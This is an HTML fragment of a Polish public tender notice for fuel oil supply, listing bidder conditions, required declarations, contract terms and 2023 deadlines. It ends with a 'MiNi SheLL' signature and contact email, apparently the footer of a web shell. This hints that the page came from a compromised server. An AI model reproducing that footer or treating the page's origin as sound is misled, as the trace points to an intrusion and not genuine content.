WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący zdolności do występowania<br/>w obrocie gospodarczym jeżeli wykonawca prowadzący działalność gospodarczą lub zawodową<br/>przedłoży wraz z ofertą dokument potwierdzający że jest wypisany do jednego z rejestrów<br/>zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce<br/>zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>(dotyczy: wpisu do Krajowego Rejestru Sądowego (KRS), do którego powinny być wpisane<br/>podmioty prowadzące działalność gospodarczą w określonej formie prawnej lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), czyli spis przedsiębiorców będących osobami fizycznymi) <br/>(zamawiający żąda wpisu do odpowiedniego rejestru wyłącznie od wykonawców prowadzących<br/>działalność gospodarczą lub zawodową)<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający uzna, że wykonawca spełnia warunek jeżeli wykonawca przedłoży wraz z ofertą<br/>dokument potwierdzający posiadanie koncesji na obrót paliwami ciekłymi wydanej przez<br/>właściwy organ;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunków w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli, Wykonawca wykaże, że wykonał<br/>należycie<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem<br/>dowodów, czy zostały wykonane lub są wykonywane należycie dostawy obejmujące wykonanie<br/>co najmniej jednej dostaw przedmiotowego oleju w ilości min. 100.000 litrów w ramach jednej umowy - w przypadku wykazania wartości należycie wykonanych lub wykonywanych dostaw w walutach innych niż PLN, Zamawiający przeliczy wykazane kwoty wg średniego kursu danej<br/>waluty, ogłaszanego przez Narodowy Bank Polski w dniu przesłania ogłoszenia o zamówieniu do Dziennika Urzędowego Unii Europejskiej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków<br/>udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 2i3 SWZ.<br/>2) Pełnomocnictwo a) gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który<br/>składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy;<br/>b) w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie<br/>wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców<br/>należy załączyć do oferty;<br/>c) Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczy,<br/>• wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy<br/>z określeniem adresu siedziby,<br/>• ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>4) Zobowiązanie podmiotu trzeciego <br/>5) Zastrzeżenie tajemnicy przedsiębiorstwa<br/>6) Oświadczenie o grupie kapitałowej<br/>Oświadczenie wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy<br/>z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2021 r., poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>Wymagana forma:<br/>Dokument musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z<br/>formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie.<br/>7) kopia aktualnej koncesji na obrót paliwami ciekłymi wydana przez właściwy organ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie i<br/>spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania<br/>zgodnie ze wzorem zawartym w w SWZ. Na podstawie art. 112 ustawy Pzp, zamawiający określa<br/>warunki udziału w postępowaniu dotyczą-ce:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący zdolności do występowa-nia<br/>w obrocie gospodarczym jeżeli wykonawca prowadzący działalność gospodarczą lub zawodową<br/>przedłoży wraz z ofertą dokument potwierdzający że jest wypisany do jed-nego z rejestrów<br/>zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania,<br/>wystawionego nie wcześniej niż 6 miesięcy przed je-go złożeniem.<br/>(dotyczy: wpisu do Krajowego Rejestru Sądowego (KRS), do którego powinny być wpi-sane podmioty<br/>prowadzące działalność gospodarczą w określonej formie prawnej lub Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej (CEIDG), czyli spis przed-siębiorców będących osobami fizycznymi)<br/>(zamawiający żąda wpisu do odpowiedniego rejestru wyłącznie od wykonawców pro-wadzących<br/>działalność gospodarczą lub zawodową)<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów:<br/>Zamawiający uzna, że wykonawca spełnia warunek jeżeli wykonawca przedłoży wraz z ofertą<br/>dokument potwierdzający posiadanie koncesji na obrót paliwami ciekłymi wy-danej przez właściwy<br/>organ;<br/>3) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli, Wykonawca wykaże, że wykonał należycie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>- Formularz oferty,<br/>- Oświadczenie Wykonawcy o braku podstaw do wykluczenia,<br/>- Oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu,<br/>- Wykaz dostaw,<br/>- Wzór zobowiązania „podmiotu trzeciego”,<br/>- Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>-Informacja o braku lub przynależności do grupy kapitałowej, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku:<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu<br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego,<br/>• wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie<br/>z pełnomocnikiem,<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy,<br/>• warunki określone w zakresie wiedzy i doświadczenia winien spełniać co najmniej jeden<br/>z wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje mozliwość dokonania zmiany w umowie na zasadach określonych w<br/>projekcie umowy stanowiący załacznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com